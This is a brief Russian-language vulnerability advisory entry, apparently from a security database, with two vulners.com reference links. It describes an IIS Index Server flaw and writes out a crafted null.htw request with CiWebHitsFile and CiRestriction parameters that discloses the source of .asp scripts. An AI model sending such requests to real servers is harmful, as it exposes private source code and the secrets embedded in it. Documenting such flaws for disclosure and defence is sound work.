С помощью запроса типа http://charon/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full можно получить исходный текст .asp или любого другого скрипта
vulners.com/securityvulns/securityvulns:doc:20
vulners.com/securityvulns/securityvulns:doc:21